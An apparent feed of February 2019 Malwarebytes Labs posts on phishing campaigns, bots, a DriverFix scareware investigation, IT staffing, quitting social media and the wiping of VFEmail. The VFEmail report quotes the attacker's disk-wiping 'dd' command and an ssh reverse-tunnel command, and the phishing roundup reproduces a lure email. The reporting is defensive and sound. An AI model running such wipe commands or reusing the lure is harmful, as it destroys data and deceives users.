Malware Bytes

Sophisticated phishing: a roundup of noteworthy campaigns

Malware Bytes Security - 6 hours 20 min ago

Phishing is a problem nearly as old as the Internet. Yet, criminals continue to reach into their bag of phishing tricks in 2019 because, in a nutshell, it just works. Dialing into the human psyche and capitalizing on emotions such as fear, anxiety, or plain laziness, phishing attacks are successful because they take aim at our weaknesses and exploit them—in much the same way an exploit kit takes advantage of a vulnerability in a software program.

To understand why phishing attacks continue to work, we look to cutting-edge tactics devised by threat actors to obfuscate their true intentions and capitalize on basic negligence. To that end, we’ve put together a roundup of noteworthy, out-of-the-box phishing campaigns of the last year. Here are the attacks that stood out.

You can’t easily dismiss this one

Myki, makers of the top-rated password manager with the same name, recently discovered a deceptive Facebook phishing scam that is so utterly convincing that it piqued the interest of security researchers.

The hullabaloo began when the company started receiving multiple reports from users that their Myki password manager was refusing to automatically fill a Facebook pop-up window on sites they visited, citing this as a bug.

After further investigation, Myki security researchers realized that it wasn’t a bug, and, in fact, their product was protecting their clients from trusting the purported Facebook pop-up. Below is a video demo of the phishing campaign they were able to unearth and successfully reproduce:

Video demo (Courtesy of Myki)

“[The] Hacker designs a very realistic-looking social login pop-up prompt in HTML,” wrote Antoine Vincent Jebara, Co-founder and CEO of Myki, in a blog post. “The status bar, navigation bar, shadows, and content are perfectly reproduced to look exactly like a legitimate login prompt.”

The fake pop-up looks and feels so real that users can drag and dismiss it like one could with a legitimate pop-up. But while it brings a convincing level of legitimacy to the attack, the pop-up gives the game away once users attempt to drag it out of the page, which can’t happen because the parts touching the edge of the browser window disappear, making users realize that the pop-up is part of the web page itself.

So, the next time you notice that your password manager is acting funny—like, not pre-filling on pop-up windows as you know it’s supposed to—try dragging the pop-up away from your browser. If a section (or mostly all) of it disappears after reaching the browser’s edge, it’s a fake pop-up. Close the page tab immediately!

Phishing by a thousand characters

By any sane standard, a 400- to 1,000-character long URL is overkill. Yet this didn’t stop a phisher from using it in his/her campaign. Not just once but in multiple instances in a phishing campaign email—much to the annoyance of clever recipients.

Screenshot of the kilometric long URL used in the campaign (Courtesy of MyOnlineSecurity)

The extracted URL above was taken from an email purporting to be a notification from the recipient’s email domain, telling them that their account was blacklisted due to multiple login failures. It then instructed recipients to upgrade and verify their email account before the service provider suspends or terminates the account.

No one knows for sure why someone would be crazy enough to attempt this. By now, fraudsters known there are better, more sustainable ways of obfuscating URLs. But alas, hardworking phishers are still out there. It’s not easy copying and pasting all those characters, after all, much less manually typing them out.

Let’s give them an A for effort, shall we? Nevertheless, phishing is no laughing matter, so let’s keep an eye on this one.

(Not) lost in (Google) translation

Online translation services were designed to serve one purpose: translate content from its original language to another. Who would have expected that phishers could use a legitimate Google Translate page as the landing page for users they’re attempting to own?

Screenshot of the phishing email (Courtesy of Akamai)

To: {recipient}
From: Security Accounts <facebook_secur@hotmail[.]com>
Subject: Security Alert
Message body:

Connecting to a new device


A user has just signed in to your Google Account from a new Windows device. We are sending you this email to verify that it is you.

[Consult the activity]

‘Why do this?’ you might wonder. According to Larry Cashdollar, Senior Security Response Engineer from Akamai, in a blog post, “Using Google Translate does some things; it fills the URL (address) bar with lots of random text, but the most important thing visually is that the victim sees a legitimate Google domain. In some cases, this trick will help the criminal bypass endpoint defenses.”

He also noted that this kind of tactic could be accepted by targets without suspicion when viewed on a mobile device, as the phishing email and landing page appear more legitimate. When viewed on a laptop or desktop, however, the flaws of this tactic are glaring.

Cashdollar mentioned that this phishing campaign is a two-prong attack, wherein phishers aimed at harvesting Google credentials first and then Facebook credentials next. The domain for the fake Facebook login is not hosted on a Google Translate page, mind you.

“…it’s highly uncommon to see such an attack target two brands in the same session,” Cashdollar further wrote.

For users to avoid falling for such a phish, Cashdollar has this to say: “The best defense is a good offense. That means taking your time and examining the message fully before taking any actions. Does the “from” address match what you’re expecting? Does the message create a curious sense of urgency, fear, or authority, almost demanding you do something? If so, those are the messages to be suspicious of, and the ones most likely to result in compromised accounts.”

Where did the quick brown fox go?

Unfortunately, it was replaced by letters placed in locations they weren’t supposed to so phishers could hide the source code of their landing page to make it look less suspicious.

This was what our friends at Proofpoint found when they encountered a campaign that leveraged custom font files for decoding and hiding content.

This particular phishing attack started off as an email purporting to originate from a major US bank, and when users clicked the link in the email, they were directed to a convincing replica of the bank’s official page, ready and waiting to receive credential input.

The custom font files, namely woff and woff2, installed a substitution cipher, which then replaced the letters users see on the page with other letters in the source code via direct character substitution. So, the text “The quick brown fox…” seen in the normal font file, for example, was “Eht wprcx bivqn fvk…” in the custom font file.

Screenshot of the woff font file (Courtesy of Proofpoint)

Proofpoint noted that the phishing kit may have been available since May 2018, if not earlier.

To combat this tactic and the others noted in this roundup, users must continue sticking to established safe computing protocols, such as not clicking links of emails that are suspicious and visiting bank websites directly from the browser instead of via email.

Businesses can also stay on top of less obvious phishing attacks by incorporating them into employee training programs. Any good anti-phishing plan will use techniques currently being used in the wild (whereas the Nigerian Prince, while still out there, is probably not one you still need to train on.)

As always, stay safe, and stay informed!

The post Sophisticated phishing: a roundup of noteworthy campaigns appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Good bots, bad bots: friend or foe?

Malware Bytes Security - 9 hours 42 min ago

One of the most talked about technologies online today is the ubiquitous bot. Simultaneously elusive yet also responsible for all of civilisation’s woes, bots are a hot topic of contention. If we went purely by news reports, we’d assume all bots everywhere are evil, and out to get us (or just spreading memes). We’d also assume every single person we ever disagreed with online is a bot. 

It might surprise you to learn that not all bots are bad. You may only hear about the negatives, but they can be a genuine form of assistance for both people at home and in the workplace.

First, let’s pin down exactly what a bot is (and isn’t).

What is a bot?

Good question.

Bots, as we understand them, perform basic or complex tasks at a speed much faster than we humans can. They’re often there to prop up the bits of a process that humans can’t get to, keeping the plates spinning on our behalf.

The ones you’ve probably heard doing good deeds are search engine web crawlers, chatbots in Skype, Slack, or various forms of instant messaging, and even front line support queries for businesses.

The rest? Those could be bad, but their mileage may vary. More areas of business depend upon bots than you may think, and they’re increasingly being used for all manner of tasks. Some benefit people at home, others simply benefit the organisation running them. However they stack up, we’re going to look at some of the more common ones and give you some things to think about. If you’re putting your own bot together, we hope this will help.


Crawlers do exactly what the name suggests: they crawl. They weave their merry way across the Internet, grabbing, analysing, and cataloguing unimaginable amounts of data daily. Without them going about their business, many things we take for granted simply wouldn’t function as well as they do.

For example, search engine crawlers help us to flesh out search engines. If they didn’t do their job and do it well, you might never actually find the thing you were looking for. Search engine crawler stagnation essentially equals the same for your website—stagnation, marooned on an island of “doesn’t live here.” There are some cases where website owners may not want to be crawled, and they can block bot access via the Robots Exclusion Standard.

Robots.txt is a file you can place in your website directory to prevent specific content from being scraped. Essentially, the Robots.txt is itself a form of (ro)bot, politely turning visitors away. Want a specific example? Many people don’t want old versions of their websites recorded for all time. As a result, they may include a line in Robots to exclude Internet Archive to come calling and scrape the content.

Where this method often goes wrong is that the polite turn away is exactly that—too polite.

Rules: meant to be broken

When the bad bots show up, they’re likely to ignore the “we’re full, sorry” notice and just throw a chair through the window. In fact, some security people will suggest not bothering with a Robots.txt at all. The theory is that some rogue entities will deliberately look for it, and then immediately go poking around all the site portions the owner wanted to hide.

“Wait, which bots are the bad bots creeping around the Internet?!” I hear you cry. Well, there’s a lot of them and poor old Robots.txt file probably won’t be much help here. One of the best ways to tell a bad bot from a good one is to examine its behavior. Bad bot behavior includes:

  • Brute force login attempts
  • Content scraping to steal or mirror content
  • Probing for hidden areas
  • Overloading the website with traffic
  • Vulnerability hunting: looking to exploit outdated apps, plugins, or content management systems

Even if you think your website is up-to-date, the server it runs on may not be, which means the bot issue is likely out of your hands. There’s a lot to contend with for a website admin.

Not all is lost, however. You can make use of a variety of scanning tools to mimic bot behaviour and see which form of bad bottery you’re most susceptible to. At that point, you can apply the correct fix as required.

Good, bad, or somewhere in-between

For some people, lines may blur a little between good bots versus bad ones. The most basic of interactions can produce all manner of knock on effects. For example:

Imagine your site is attacked by a content scraper, and all your hard work ends up on a cut and paste merchant’s website. Not cool. You then sign up to a copyright detection bot service, which crawls the web in search of your pilfered text. The scammer running the site has a block in its robots.txt file explicitly requesting the copyright sniffer not to come knocking. At this point, the bot is fully justified in avoiding the polite request to go in, scan the text, then report back to base that someone’s been up to no good. Your bot is now breaking the rules, and you’re tainted with justified wrongdoing forever.

Beating the system

Additionally, search engines can be gamed. SEO poisoning, where rogue links are included in results, was a problem for a long time before major providers started clamping down (with variable success). Even so, there are variations on these attempts. And outside of those, you still have the threat of compromised sites giving bad portals a boost.

If your organisation intends to deploy a web-scraping bot of its own, you may want to keep some of these developments in mind. It’s a fine line between helpful and nuisance, and not all rival bots play nice. It only takes a few mishaps with another org’s service or website, and you’ve got a major PR issue to deal with.

Time for a chat?

Chatbots have been around for a long time. The first was ELIZA, created in 1966 by Joseph Weizenbaum. While he considered ELIZA to highlight the superficiality of human/computer interaction, he was surprised at people attributing human emotions to the dialogue. Wind forward a couple of decades, and you have Roman Mazurenko turned into a chatbot for friends and family to interact with after his tragic early death. Years later, the same questions are being asked in terms of where the line is drawn, and whether such interactions are even healthy.

Many people think of chatbots (at least the good ones) as a recent development. However, chatbots have been used for some time for nefarious purposes—the first thing that springs to mind is pornography spam bots asking for credit card details. Quite often, that association is accompanied by thoughts of of malware and other shenanigans. Spreading out from forums and old-style chatrooms/IRC to instant messaging platforms and social media, bots have improved in their ability to actually help, instead of pilfer data or infect machines.

Often sporting limited phrases and becoming the butt of endless “look at me fool this spam bot” jokes, many businesses didn’t bother to invest in bots because the technology wasn’t there. Nowadays, you’ll find decent bot assistance for everything from shopping portals and banking to utility service providers.

Healthy living

Even Microsoft are in on the action at this point, with their Microsoft Healthcare Bot. This allows providers to customise their own AI-driven bot solution and roll it out to customers and clients. Elsewhere, chat-centric health bots are clearly seen as the future of medical assistance, with everything from therapy to simple daily reminders to take your pills. This view may be a little optimistic, as the potential for incorrect diagnosis or faulty advice is there. Integration with household IoT devices known to occasionally glitch out could increase that possibility. However, this is a clear use-case for mostly maligned bot technology as a force for good.

Fun for all the family?

Chatbots for children/teens are also a big thing now. Many of them are integrated with Facebook messenger, and will allow them to talk some Hearthstone, Marvel, or (for the older bot fans) converse with an AI replica of a dead horror movie character.

Ad fraud

Ad fraud is something that seems to have been around as long as ads themselves. Bots automate the process of clicking ads to provide a bump in income for the person who placed the ad. The more clicks, the more revenue generated. This is most commonly accomplished by infecting as many PCs as possible, then using those PCs to click ads.

There’s been many ad fraud trends over the years. One of the biggest I can remember is the rush to profit from high pay-outs on the word “Mesothelioma,” a rare form of cancer related to asbestos. For this, websites hijacked IE users, infected their PCs, and used instant messaging to send bad links while opening the ads in the unaware user’s browser.

Quite sophisticated, and apart from scale and profit, nothing much has changed. Ad fraud is entirely harmful, and often goes hand-in-hand with malvertising and ransomware attacks. These bots were designed to do bad, and they are accomplishing what they were meant to do.

Snipers in commerce land

Let the bidding wars begin! Automated commerce tools are pretty cut and dry. Not everyone wants web pages crawling, but you aren’t really going to lose out to someone in direct competition. Company X may use chatbots and your business doesn’t, but some customers will prefer the human touch and vice-versa. It isn’t going to make or break anything, particularly.

Where sales are concerned though, it’s pretty black and white. Where cash is involved, anything can happen and usually does. It’s a long time since scammers used bots to “buy” from other bots and bump up fake reputations, and that was quickly replaced in popularity by sniper tools.

Sniping tools have been around for a long time, and are somewhat controversial in seller circles. The basic idea is to give the sniper tool access to your eBay account (or any other bidding service), and at the very last moment before a sale ends, it’ll throw in your bid. Rivals are unable to counter because there’s nothing they can do about an automated service working to nanoseconds instead of a human hammering at a keyboard. So is this bad? For the other users, yes. For eBay as a platform, absolutely. Overall? Remains to be seen.

Fending off the bad bidders

Fixed price sales are a bidding bot’s worst enemy, because there’s nothing to gamble. Take it or leave it at the listed price. Some sites will offer a time extension if a last minute bid comes in, which may or may not help ward off the snipers. One of the biggest drawbacks to sniping is you often must hand over login details to the sniping tool. Do you trust it? Is it safe? Can the people who operate the service see your credentials? All of this and more are natural drawbacks to sniping, and could keep your business on top of those grabbing all the best items.

In the digital space of non-tangible goods, bidding and trading also reigns supreme. Sadly, it comes with major risks. Steam, the video game platform juggernaut, offers its own marketplace. There, you can buy all manner of in-game items, cosmetics, game cards, and so on. Some of these items sell for pennies and cents, others fetch hundreds of pounds and dollars.

A short-lived victory

One enterprising individual made a trading bot for the Steam marketplace, and spent some time  buying low and selling high across three separate Steam accounts. Ultimately, they amassed game items worth $10,000, which included 2,261 Team Fortress 2 keys.

Valve discovered the botting antics, and subsequently banned all accounts and deleted all the items. Yes, all ten thousand dollars’ worth. This is a clear case of gaming the system and would have also arguably impacted others. While this may have caused a few people to grab some items at a lower price, overall, it’s tough to call this one an example of a good bot (except maybe for the creator).

Bots by any other name

Most of our examples are essentially quite crude bots, living out their days simply sniffing the web or making the occasional product bid. There’s a big push for bots on your devices instead of scouring the web, mostly in the form of personal digital assistants. To a large degree, any regular mobile device does a lot of this anyway (Ahem, hi Siri!). Personalising said tasks and wrapping them up under a friendly interface is the name of the game.

As with other bot types, much of the information you’ll come across online is aimed at the bad stuff. That’s fine—it’s usually easier to spot things getting up to no good than invisible processes ticking along in the background harming nobody. Even so, plugging “mobile bots” into Google brings back nothing but bad bots, mobile game hijacks, scams, and more bad stuff. There are a few hints as to how this new realm of bot may play out as a force for good, including some outside of the mobile world, that illustrate the positive directions botting could move in.

While the word “bot” may never quite shake its negative associations, it’s absolutely worth revisiting and re-evaluating the next time your work colleagues mention a cool new bot program they’ve been assigned. Who knows, you may even give them some helpful suggestions to get the ball rolling.

The post Good bots, bad bots: friend or foe? appeared first on Malwarebytes Labs.

Categories: Malware Bytes

A week in security (February 11 – 17)

Malware Bytes Security - Mon, 02/18/2019 - 11:30am

Last week on Malwarebytes Labs we discussed the return of the Sextortion Bitcoin scams, we gave you an early overview of the exploit kits in the winter of 2019, we talked about the destruction of VFEmail service, for consumers we discussed whether you should remove yourself from social media, for businesses we discussed the implementation of an anti-phishing plan, and the concept of whole team security to relieve overworked IT departments.

  • Security researchers have found that Intel’s Software Guard Extensions (SGX) don’t live up to their name. In fact they can be used to hide pieces of malware that silently masquerade as normal applications. (Source: The Register)
  • A targeted phishing campaign is underway that states your email has been blacklisted and then asks you to confirm it by entering your credentials. For some reason, this campaign is using phishing links that can contain almost 1,000 characters. (Source: BleepingComputer)
  • Malicious actors have been hacking WordPress websites by exploiting vulnerabilities in a fairly popular plugin called WP Cost Estimation & Payment Forms Builder. Developed by Loopus, the plugin allows WordPress website administrators to create cost calculators and payment forms. (Source: SecurityWeek)
  • The Emotet Trojan, a thorn in the side of financial institutions and your average individual alike, is back with new techniques and an upsurge in attacks. In recent campaigns malicious documents containing Emotet are being distributed via URLs hosted on threat actor-owned infrastructure as well as traditional spam email attachments. (Source: ZDNet)
  • In the weeks leading up to Valentine’s Day 2019, researchers notice a new form of Gandcrab appearing in romance-themed emails. Hackers love the holidays, and Valentine’s Day is no exception. (Source: DarkReading)
  • New research published by the International Computer Science Institute in California suggests that at least 17,000 Android applications are creating permanent records of your online activity for advertising purposes even when you ask for such information to be forgotten. (Source: ZDNet)
  • Microsoft booted eight malicious apps from its official desktop and mobile app store after researchers found the programs surreptitiously mined for Monero cryptocurrency. All these apps were likely developed by the same person or group. (Source: ThreatPost)
  • A new phishing attack bent on stealing Facebook credentials has been spotted – and it’s turning researchers’ heads due to how well it hides its malicious intent. The status bar, navigation bar, shadows and content were perfectly reproduced to look exactly like a legitimate login prompt. (Source: ThreatPost)
  • Jeff Bezos became the most famous and powerful person to claim to be a victim of sextortion, the term often used to describe the otherwise underreported cases of extortion using intimate or sexually explicit photographs or videos. (Source: Wired)
  • Malta’s leading bank resumes operations after cyberheist-induced shutdown. The Bank of Valetta, which went dark for a day after the fraudulent transfers of €13 million, is now looking to get the money back. (Source: WeLiveSecurity)

Stay safe, everyone!

The post A week in security (February 11 – 17) appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Crack hunting: not all it’s cracked up to be

Malware Bytes Security - Mon, 02/18/2019 - 11:00am

People sometimes ask us in the forums if a keygen or software crack is safe to use. Sometimes, these programs do what they say on the tin. Other times, they’re not what they say they are. In this post, I’ll describe what happened when I went crack hunting, and why it is often unsafe to carry out this activity.

Researchers like myself often browse crack and keygen sites because they are known to host many affiliate links to third-party applications, many of which include Potentially Unwanted Programs (PUPs), adware, or worse. Many of these sites also host downloads for malware.

These sources are important to research because users often browse crack and keygen sites looking to find paid software for free. This is risky practice, though, because the user may end up downloading unwanted software that can do more harm than good.

In this case, I was looking for a crack for Windows 10 Pro, since it’s popular software. The crack download itself was actually not a crack, but a file we detect as PUP.Optional.InstallCore.Generic. This “crack” did not run properly on my test machine, most likely because of sandbox sensitivity.

While the “crack” was being downloaded, the download page redirected to a page advertising DriverFix. The advertisement is one of many adverts offered by ad rotators.

I clicked on the link, which in turn opened the following site:

Clicking the “download now” button downloaded the file from the DriverFix site and delivered basic instructions on how to get the program to run.

According to the website, DriverFix is a Windows application that scans your machine to find outdated drivers, and allows users to update those drivers from within the application with one click. So I tried it.

Once the software was installed, it automatically launched, ran a scan, and displayed the results of the scan. Here are results from two different machines. Notice the results show drivers as being “Extremely old.”

This gives users false ideas that their machine has issues that must be fixed. When I expanded the info for my batteries and checked it, indeed there are newer drivers available, though calling my drivers “extremely old” is a bit of a fallacy.

When the user attempts to “update all” or update one driver, they are presented with a pricing page to pay for the services to update their drivers.

The user then has the choice to update one driver, update all drivers on their system, or purchase the “family pack,” which will update as many as three PCs. Many users will opt-out of purchasing the services at this point.

This is where things get hairy. One does not have to buy new drivers. In my case, all I did was Google the driver description “Microsoft ACPI-compliant control method battery driver Windows 10” and found results right from the Microsoft Update Catalog site.

If this proves to be difficult for the not-so-tech-savvy folk, you can also open Device Manager, expand the driver in question, open the Driver tab, and click “Update Driver.” Microsoft will download the driver your system needs at no cost. Plus, you can be sure it is coming from Microsoft.

If the user decides not to purchase and simply closes DriverFix, eventually they end up with warning messages from DriverFix regarding their outdated drivers when they do anything on their machine that uses the drivers flagged in the initial scan. Below is the notification I received from DriverFix when I was saving a file to my machine.

This is not typical behavior from benign software. This behavior is designed to scare the user into thinking they have severe issues that will only be solved by purchasing services from DriverFix.

This is after the user might have thought they were getting a free product that promised to fix driver issues in one click when they ran into the initial advertisement.

Unless your machine is very old, Microsoft provides compatible drivers, or the computer manufacturer automatically provides driver updates through its own built-in software at no cost.

Between discovery of this program on December 19, 2018 and January 9, 2019, the installer for this product has been detected 3,245 times by Malwarebytes. There have also been 839 reported traces detected as a result of installs during the same time frame.

Malwarebytes blocks the website that hosts DriverFix downloads, and stops the application installer from launching.

We detect the application as PUP.Optional.DriverFix.

If you installed DriverFix, we have instructions on how to remove it or how to add exclusions if you decide to keep it.

As long as sites continue to try pushing cracked software that seem too good to be true (and thus, is actually harmful to users), we will continue to detect such programs in order to protect our customers.

And for those looking for the silver bullet software in crack or keygen sites, we suggest making sure you can spot benign programs from those that try to squeeze a few bucks out of unsuspecting users. Exploring these sites is not for the uninitiated—best to stick to tried and true, legitimate versions of software programs instead of risking illegal crack or keygen sites and programs.

The post Crack hunting: not all it’s cracked up to be appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Tackling the shortage in skilled IT staff: whole team security

Malware Bytes Security - Fri, 02/15/2019 - 11:40am

Is your IT department understaffed, overworked, and are you looking for reinforcements in vain? Maybe these hard-to-hire reinforcements can be hired from within, rather than having to outsource or hire expensive, short-term extra help. While this was usually only done if your own staff was falling too far behind, the burden of the shortage of skilled IT staff in the workforce is starting to take its toll, and this is now be a viable option for all.

Undoubtedly, there is a person in every group who is more computer-savvy than others. The one who can end your problem or answer your question in seconds, when it would take hours, if not days, to get someone from the IT department to look at it. These people shield the IT department from several questions each day, and keep frustrated endpoint users at bay that had given up asking the overwhelmed crew for help and assistance.

Nevertheless, professionals often frown upon the help given by these helpful troubleshooters on the floor level. How can we ensure that the help given by these often self-appointed volunteers is nothing short of the first-tier support provided by the IT department?

Pros and cons

First of all, make sure that your IT staff is willing to share their responsibilities with people on the work floor. Without their full cooperation, this plan is destined to fail. We can all agree that trained and weathered IT professionals will generally do a much better job than people who have been trained for other jobs. But if you are facing the same problem as most companies and you just can’t hire enough IT professionals, you will probably welcome all the help you can get. And having to rely on a frustrated and overworked IT staff might be worse than letting volunteers that feel recognized and empowered help in any way they can.

On the other hand, in “any way they can” might be just turn out to be the problem with this solution. It should be made crystal clear when the volunteers are expected to call in the help of the professionals. You do not want to face some catastrophe because one of the benevolent volunteers Googled a half-baked solution for a problem that was reported to them.

This whole team security strategy fits nicely in the ongoing shift to BYOD, and even Bring Your Own Security (BYOS). Generally speaking, it will make your employees happier, but it takes some planning and attention to make sure it also works for the company as a whole.

BYOD strategy

One important thing to consider is whether the company has adapted a user-centric or device-centric approach to technology integration. If every user is equipped with a device according to their personal preference, there could be a multitude of devices in use. This can be frustrating enough for a trained professional to deal with, let alone a volunteer who is about to find out that everything works just a little bit differently on their colleagues’ devices.

Determine at the outset the composition of your technology and workforce, and you can better structure a plan for your volunteers—and your IT staff, too.

Education and training

Training your entire staff in security basics will certainly result in less work for your IT staff. And while providing your employees with security awareness training is a good and necessary start, you can bolster support for your IT team by offering additional IT and security training to those who are interested. There are lots of useful training programs that deal with common issues found in the software that your employees are using on a daily basis. And if the trainee is motivated and interested (as we would expect from these volunteers), it shouldn’t take up a large amount of their time.

In addition to training, you’ll also want to set up a system of rewards for your volunteers, whether that’s monetary compensation, company swag (for example, custom hoodies designating them as IT helpers), or other perks. While many volunteers may be happy to help out of the goodness of their hearts, given them additional incentive will only strengthen their commitment and attract others to the team.


Once the volunteers have received proper awareness training, equip them with the tools and authority to help their peers and make sure the rest of their department knows that they have been properly trained and can be asked for help with certain issues. This way, the people in that department are comfortable with asking for their help and will know when they can go to them instead of IT.

What this means: Volunteers will need access to certain software, systems, or cloud-based services. They’ll also need a way to communicate their actions to the IT team, so they’re aware of minor issues, even if they didn’t have to fix them themselves. Do they develop a ticketing system? Do they integrate with the current system for reporting issues? Do they spend an hour at the help desk?

No matter how you decide to enable your volunteer staff, make sure that they understand the consequences of their actions. Don’t tell them to “just do this” without explaining why you want it done that way. Give them some background so they can build out their expertise and learn how you want to run things.


Another important step is to give volunteers the administrative powers to make the actual changes themselves. With the ongoing uptick in Bring Your Own Device (BYOD) policies, most of these users have learned how to make the necessary changes to their own devices, and how to troubleshoot some of the more common issues. They may even have some specialists outside of the company that they turn to when there are problems with the device that they consider their own.

One caveat: Make sure that the volunteer is informed about the risks of combining work and personal information on the same device—and what the consequences are if they don’t adhere to company policies. As always, clear communication is a key to success. Make sure everyone is aware of what is expected of them, and what they can expect in return.

Points of attention

Finding the right people to assist your IT staff with easy-to-fix issues or simple roll-outs can make your employees happier. The IT staff can concentrate on problems that are more challenging and don’t have to run around like headless chicken playing whack-a-mole for every minor problem, like users who just need to reboot, haven’t turned on the power, or are holding the mouse upside-down. Meanwhile, your volunteers will feel that their helpful attitude has paid off, and they are now officially allowed to help their peers.

The volunteers will need the training, tools, permission, and rewards to perform their new tasks. But, and we cannot stress this enough, they will also have to be informed about their boundaries. You don’t want to see them go overboard because they are reluctant to admit that something is over their head. Remember that difficult problems may show up as minor issues at first. So empower them to help, but make sure they know when to step aside. That way, the whole team can keep your organization secure.

The post Tackling the shortage in skilled IT staff: whole team security appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Should you delete yourself from social media?

Malware Bytes Security - Thu, 02/14/2019 - 12:30pm

You’re feeling like you’ve had enough. All the recent news—from Facebook’s Cambridge Analytica snafu to various abuses of Twitter vulnerabilities—has you wondering: Should I delete myself from social media?

Social networking does have its positive aspects. You can stay in touch with distant (or not) relatives, be included in the planning of social events within your circle of friends, get real-time updates on regional and national news, and promote your company, content, or other personal ventures. Plus, you get to experience all the cool memes a full two weeks after they’ve been posted on Reddit.

Then again, there are quite a few reasons—spanning security, privacy, and overall shady business practices—for leaving. In 2018 alone, Facebook experienced a security breach that impacted 50 million accounts, was responsible for a genocide incited using its platform, kept user data it said it deleted, and was caught abusing Apple development apps to test on children. Twitter, meanwhile, has not only been at the butt end of password bugs, hacks, and data breaches, but some could say these days is a general dumpster fire of bot accounts.

Instagram and Snapchat are not without their flaws, either. Hackers are targeting influencer accounts on Insta, while Snapchat has been the recipient of phishing attacks and security breaches.

Unfortunately, we can’t make the decision to quit social media for you. Instead, we recommend you make a list of pros and cons. Consider what data might be lost. Consider what time and peace of mind might be gained. Weigh the rewards against the risks. If you come away feeling ready to take a step back, but not quite quit cold turkey, we can help you with ways to tighten security and privacy settings. And if that’s not enough, we’ll show you how to delete your accounts.

Let’s start slowly

If you’re not quite ready to cut the chord, a good option for cooling down on social media is to adjust the privacy settings on all of your accounts. This is a sensible thing to do, even if you aren’t considering leaving. It also has the bonus side effect of increasing awareness of just how much you share on social media.

In a previous blog, we discussed how to secure your social media profiles in great detail. We recommend users who aren’t deleting themselves read this first to understand the intricacies. Next, here’s a quick and dirty list of links to follow in order to adjust privacy settings across the top four social networking platforms:

After adjusting the settings, it’s a good idea to monitor and track your social media usage moving forward, either for the purpose of time management, focus, or beating social media addiction. As more and more of our media consumption moves to smart phones, you can leverage several apps that will help you achieve these goals. These include:

Goodbye, top four!

Let’s say you sat down, had a good think, and decided that it’s time to move on from social media. You can begin by collecting the appropriate links. Below, we’ve included links to download your data from the most popular platforms. You should download your personal information from these social networking sites prior to the nuclear option, should you experience remorse. Plus, it’s a real eye opener to find out exactly how much data you generate and share on social networking platforms.


Time to permanent deletion: Once 14 days have passed, your deletion request will be started. This can take upwards of 90 days to complete.


Time to permanent deletion: It takes up to 30 days for Twitter to completely delete your account.


Time to permanent deletion: Immediately!


Time to permanent deletion: 30 days


Ha ha ha, ho ho ho, he he he he. This one is mostly for the giggles. Google will abandon this particular endeavor on April 2, 2019. But if you feel the need to delete yourself before then, here’s what to do:

The right time

Security researchers love social media platforms. They’re a vast source of open-source intelligence (OSINT) and help us make attribution possible (provided your adversary has poor OPSEC). However, the reasons we enjoy social media may also be the reasons why regular consumers should take a beat and consider the benefits.

When you’re ready to make a decision, we’ve given you all the necessary links to back up and delete these accounts, as well as some material that may help you decide which ones to keep, and how to properly secure them.

If social media is causing anxiety, stress, or depression; if you’re tired of your data being mined and shared with third parties; if it’s starting to feel more like work to maintain instead of pleasure, then it may be time to shore up defenses and take a break, or even step away for good. And if that time comes, we’re here for you.

The post Should you delete yourself from social media? appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Hacker destroys VFEmail service, wipes backups

Malware Bytes Security - Thu, 02/14/2019 - 11:56am

An email service called VFEmail was essentially put out of business after a hack intended to delete everything in (and out of) sight.

“Yes, @VFEmail is effectively gone. It will likely not return. I never thought anyone would care about my labor of love so much that they’d want to completely and thoroughly destroy it.”

This wasn’t “just” a simple webpage compromise, or some sort of database dump. In fact, it was something altogether quite worse. Put simply, the total annihilation of a service and most, if not all, of its infrastructure.

What happened?

Users of VFEmail woke to the following message on the service’s website:

Click to enlarge

!!!ALERT!!!! Update Feb 11 2019

vfemail(dot)net and mail(dot)vfemail(dot)net are currently unavailable.

We have suffered catastrophic destruction at the hands of a hacker, last seen as aktv[redacted]

This person has destroyed all data in the US, both primary and backup systems. We are working to recover what data we can.

New updates 2/11/19 6pm CST:

Incoming mail is now being delivered.

Webmail is up. Note-mailboxes are created upon new mail delivery. If you cannot login, you may not have received mail.

Mailboxes are new, no subfolders exist.

No filters are in place. If you created a filter with Horde, Login to Horde, Create any folders you need. 

Click Filter, Click Script, then click ‘Activate Script’.

There is no spam scanning at this time – Incoming mail may be Spam scanned depending on DNS status.

Free users should not attempt to send email, there is currently no delivery mechanism for free accounts. Paid accounts should be useable, including Horde/Roundcube contacts and calendars.

At this time I am unsure of the status of existing mail for US users. If you have your own email client, DO NOT TRY TO MAKE IT WORK.

If you reconnect your client to your new mailbox, all your local mail will be lost.


Did they put word out on social media?

You bet they did, and the Tweets don’t make for pleasant reading:

This is not looking good. All externally facing systems, of differing OS’s and remote authentication, in multiple data centers are down.

— (@VFEmail) 11 February 2019

Caught the perp in the middle of formatting the backup server:
dd if=/dev/zero of=/dev/da0 bs=4194304 seek=1024 count=399559
via: ssh -v -oStrictHostKeyChecking=no -oLogLevel=error -oUserKnownHostsFile=/dev/null aktv@ -R -N

— (@VFEmail) 11 February 2019

It may sound a bit exciting to walk in on the scene of the crime, but I can assure you it’d only involve lots of “oh no” types of expression. If they’re already wiping your backups, the game is indeed over.

Did they recover?

Sadly things didn’t improve, and a few hours later the full damage report was available:

At this time, the attacker has formatted all the disks on every server. Every VM is lost. Every file server is lost, every backup server is lost. NL was 100% hosted with a vastly smaller dataset. NL backups by the provider were intact, and service should be up there.

— (@VFEmail) 11 February 2019
All data was encrypted at least, but said data basically vanished into thin air when it was scrubbed:

Yep, but it doesn’t matter. They just formatted everything.

— (@VFEmail) 11 February 2019
They also managed to destroy various VMs using different forms of authentication.

Strangely, not all VMs shared the same authentication, but all were destroyed. This was more than a multi-password via ssh exploit, and there was no ransom. Just attack and destroy.

— (@VFEmail) 11 February 2019

“Just attack and destroy”

Services and sites have been attacked severely in the past, some to the point of destruction. However, there’s almost always an overt reason given, or a ransom, or some other clue.

Here, it’s nothing but complete devastation and a service in existence since 2001 absolutely ruined in the bargain. There’s no indication as to how they got in, or if an important system had no multi-factor authentication. A number of commentators have suggested this flaw may have been a way in for the attacker.

Until detailed analysis is published, it’s hard to say why this happened. Did the owner of the service aggravate a talented hacker? Or could one of the service users have drawn attention from unwanted sources, and this is the end result? It’ll be fascinating to find out. But if you operate a similar service, you may wish to consider a decent offline backup system in the meantime.

The post Hacker destroys VFEmail service, wipes backups appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Businesses: It’s time to implement an anti-phishing plan

Malware Bytes Security - Wed, 02/13/2019 - 11:54am

